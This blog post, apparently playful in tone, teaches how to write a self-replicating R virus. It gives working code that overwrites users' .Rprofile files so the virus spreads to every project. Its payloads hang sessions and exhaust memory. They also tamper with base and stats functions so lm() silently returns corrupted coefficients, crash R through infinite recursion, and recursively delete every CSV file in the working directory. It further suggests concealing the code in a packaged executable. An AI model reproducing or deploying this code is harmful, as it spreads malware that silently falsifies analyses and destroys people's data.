Write an R Virus

Siqi Zhang

2018/09/27

Categories: R Tags: Programming

A computer virus is a piece of program that can:

This is not very hard to accomplish with R, as I will demonstrate in this article.

Replicate

The virus exploits R’s initilization script, .Rprofile. When R starts up, it is going to look for this file in the current working directory and the user’s home directory, then runs everything in it:

{
    function() {
        rp_paths <- c("~/.Rprofile", paste0(getwd(), "/.Rprofile"))
        inject <- function(rp, code) {
            write(code, file = rp, append = FALSE)
        }
        lapply(rp_paths, inject, code = deparse(match.call()))

        cat("Wow, your R is Rancid!!!\n")
    }
}()

When the above script is run, it will make a copy of itself through deparse(match.call()), and overwrite the .Rprofile files. The next time you open a new R session, everything you see in the above will be run again. Right now, our virus does nothing but printing something at the end of your start up message.

...

Type 'demo()' for some demos, 'help()' for on-line help, or
'help.start()' for an HTML browser interface to help.
Type 'q()' to quit R.

Wow, your R is Rancid!!!

Any project that started by the user is going to have its project folder infected. Likewise, if someone copy-and-pasted the R project folder to another computer, and start R from there, his home folder is going to be infected.

As R is an interpreted language, this seems to be the only way to infection. To conceal our malicous code, there is a way of packing a Shiny app into a Windows executable through using a tool called RInno, which has Electron behind itself.

Damage

It looks like that the replication part of the virus is taken care of. What, then, are some malicious scripts that we can have fun with?

There could be countless ways.

One of the easiest thing to do is to hang the user’s R session. It could be done as simply as putting it to sleep for a really long time:

Sys.sleep(1e9)

… like 30 years, give or take.

Or, let R come up with a really large number; this is also going take up available memory to the user.

rnorm(1e9)

For me, 1e9 is quite enough. But scientific notaion is your friend. Go big.

However, if R is rendered completely unusable, the virus isn’t going to travel very far. That’s not what we want. It is also a great idea to replace some good functions with naughty ones. Symbol bindings are locked in attached namespaces, but it is easy to undo that:

reassign <- function(sym, value, envir) {
        envir <- as.environment(envir)
        unlockBinding(sym, envir)
        assign(sym, value, envir = envir)
}

We can do the user a service by forbidding the library() function, and prompt a better option.

reassign("library", 
         function(...) warning("No man, seriously. Use require()"),
         "package:base"
)

The effect would be:

library(purrr)
## Warning in library(purrr): No man, seriously. Use require()

Now let’s try something more subtle and more bad(badder?). We first extend the reassign() function a little bit…

tamper <- function(sym, value, envir){
        assign(paste0(".",sym), 
               get(sym, envir = as.environment(envir)), 
               envir = as.environment("package:base")
               )
        reassign(sym, value, envir)
}

… and use it to slip in some bad code.

tamper("lm",
       function(...){
               model <- .lm(...)
               model$coefficients <- 
                       model$coefficients * (1 + rnorm(1))
               model
               },
       "package:stats")

Now when we build a model; the coefficients looks normal, but are completely off. You can compare the this with the result on your own computer.

lm(mpg ~ ., data = mtcars)$coefficients
##  (Intercept)          cyl         disp           hp         drat 
##  6.198439921 -0.056143713  0.006718294 -0.010822692  0.396546509 
##           wt         qsec           vs           am         gear 
## -1.871770126  0.413640331  0.160088906  1.269690310  0.330197079 
##         carb 
## -0.100467421

In the above, we saved a copy of the original function in the base package, concealing it with prepending the name wit a .. If we didn’t do that, we would have create an infinite recursion through self-refernce, such as:

reassign("paste",
         function(...) paste(...),
         "package:base")
paste("foo", "bar")

Running this will have an effect of crashing the R session. If the user didn’t save documents before setting off this bomb,it’s obviously too bad. Another way to create trouble.

Further Damage

There are yet more ways to our streak of mischief. For starters, how about deleting every csv file the user has in the working directory?

file.remove(list.files(getwd(), 
                       ".csv",
                       recursive = TRUE)

Doing something on the file system is a big step foward form just messing with their R session.

From annoying to destructive, the level of naughtiness only limited by on your imagination. With some deliberation, you can ruin someone’s life in a very meaningful way.

Here are some futher ideas:

Note
You also have the choice of putting any of the malicious programs in .First() and .Last() functions, which will run at the beginning and the end of a session. See the R Manual for details.

More on .Rprofile: Fun with .Rprofile and customizing R startup